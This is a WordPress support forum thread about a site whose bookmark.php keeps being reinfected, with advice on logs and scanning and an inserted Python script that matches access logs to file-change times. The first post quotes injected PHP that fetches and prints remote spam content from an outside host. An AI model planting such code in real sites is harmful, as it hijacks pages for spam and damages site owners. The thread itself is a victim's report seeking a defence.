Title: bookmark.php exploit
Last modified: August 19, 2016

---

# bookmark.php exploit

 *  [brsilver](https://wordpress.org/support/users/brsilver/)
 * (@brsilver)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/)
 * My site has been hacked and after I clean it up it comes back after a week or
   so. The exploit replaces bookmark.php with a new one that appends a script that
   begins
    function encoded_optimal(){print file_get_contents('http://nadoelo.cn/baza2/21.txt');}…
   The file that is loaded contains hundreds of links to casino sites, and this 
   causes all my Adsense ads to be casino ads. There may be other things it is doing
   but this is the most obvious.
 * I have not seen other references to this exploit, although if you google
   “nadoelo.cn” you will see dozens (maybe hundreds) of blogs where this script
   returns an error. So it must be very common. How to get rid of it once and for
   all. I have uploaded clean new everything, including plugins, checked db with
   Exploit Scanner, changed ftp password. Today I am trying removing write
   permission on bookmark.php.

Viewing 3 replies - 1 through 3 (of 3 total)

 *  [alism](https://wordpress.org/support/users/alism/)
 * (@alism)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340168)
 * Might be worth scanning your own computer for malware, in case your FTP password
   is being stolen.
 * See if you can spot anything suspicious in your log files. Speak to your host
   too. The hack might be coming through another insecure script elsewhere on the
   server.
 *  [Rev. Voodoo](https://wordpress.org/support/users/rvoodoo/)
 * (@rvoodoo)
 * [16 years, 5 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340175)
 * If you can look at your access logs, it could help. Look at the time
   bookmarks.php was changed, compare to access logs.
 * You may see that the file is changed using another file on your server. A file
   hidden away several folders deep that is giving access to your WP files.
 *  [Aren Cambre](https://wordpress.org/support/users/novasource/)
 * (@novasource)
 * [16 years, 3 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340480)
 * I just helped a site with a similar problem, but **wp-blog-header.php** is what
   got hit on that site.
 * Sounds like WordPress has a security hole.
 * **wp-blog-header.php** should be 274 bytes but had ballooned to 106,708 bytes.
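
The access-log comparison suggested in the replies above, as an added example that is not code from this thread: it lists the requests made within a short window of a file's modification time and ranks successful POSTs to PHP scripts first. It assumes Apache/nginx combined log format; the function name `requests_near`, the sample log lines, paths, addresses and timestamp are all constructed for illustration.

```python
import re
from datetime import datetime, timedelta, timezone

# Combined Log Format: host ident user [time] "METHOD path proto" status size ...
LOG_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<path>\S+)[^"]*" (?P<status>\d{3}) '
)

# Constructed sample lines (documentation address ranges, hypothetical paths).
SAMPLE_LOG = [
    '192.0.2.10 - - [12/Jan/2010:03:10:00 +0000] "GET /index.php HTTP/1.1" 200 5120 "-" "Mozilla/5.0"',
    '198.51.100.7 - - [12/Jan/2010:03:14:58 +0000] "POST /wp-content/uploads/2009/cache/x.php HTTP/1.1" 200 31 "-" "-"',
    '192.0.2.44 - - [12/Jan/2010:03:15:30 +0000] "GET /wp-includes/bookmark.php HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
    '192.0.2.10 - - [12/Jan/2010:04:00:00 +0000] "POST /wp-login.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"',
]
# Constructed modification time; on a real host read it from os.stat(path).st_mtime.
SAMPLE_MTIME = datetime(2010, 1, 12, 3, 15, 0, tzinfo=timezone.utc)

def requests_near(log_lines, modified_at, window=timedelta(minutes=2)):
    """Return (score, time, host, method, path, status) tuples for requests
    within `window` of `modified_at`, most suspicious first."""
    hits = []
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m:
            continue  # skip lines that are not in the expected format
        when = datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z")
        if abs(when - modified_at) > window:
            continue
        path = m["path"].split("?", 1)[0]
        # Heuristic ranking: a successful POST to a PHP script is the most
        # likely way one web-reachable file rewrote another.
        score = 0
        if m["method"] == "POST":
            score += 2
        if path.endswith(".php"):
            score += 1
        if m["status"].startswith("2"):
            score += 1
        hits.append((score, when, m["host"], m["method"], path, m["status"]))
    return sorted(hits, key=lambda h: (-h[0], h[1]))

if __name__ == "__main__":
    for hit in requests_near(SAMPLE_LOG, SAMPLE_MTIME):
        print(hit)
```

The modification time can be reset by whoever wrote the file, so the inode change time (`st_ctime` on Linux) is worth checking as a second reference point.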


The topic ‘bookmark.php exploit’ is closed to new replies.

## Tags

 * [bookmark.php](https://wordpress.org/support/topic-tag/bookmark-php/)
 * [exploit](https://wordpress.org/support/topic-tag/exploit/)

 * In: [Fixing WordPress](https://wordpress.org/support/forum/how-to-and-troubleshooting/)
 * 3 replies
 * 4 participants
 * Last reply from: [Aren Cambre](https://wordpress.org/support/users/novasource/)
 * Last activity: [16 years, 3 months ago](https://wordpress.org/support/topic/bookmarkphp-exploit/#post-1340480)
 * Status: not resolved

